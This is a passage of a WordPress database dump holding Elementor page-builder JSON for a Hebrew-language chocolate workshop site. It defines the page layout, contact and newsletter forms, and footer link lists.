settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8142c60\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(873,179,'_elementor_version','0.4'),(874,179,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(878,180,'_elementor_template_type','single'),(879,180,'_elementor_edit_mode','builder'),(880,180,'_wp_page_template','default'),(881,180,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(882,180,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"5797de9\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"author\",\"icon\":\"fa fa-user-circle-o\",\"_id\":\"0e28084\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\\u05e0\\u05db\\u05ea\\u05d1 \\u05e2\\\"\\u05d9 \",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"\",\"show_icon\":\"default\"},{\"type\":\"date\",\"icon\":\"fa fa-calendar\",\"_id\":\"b1560e5\",\"date_format\":\"3\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\"},{\"type\":\"time\",\"icon\":\"fa fa-clock-o\",\"_id\":\"2e36932\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\"}],\"space_between\":{\"unit\":\"px\",\"size\":27},\"icon_align\":\"left\"},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"f3418e3\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8142c60\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"i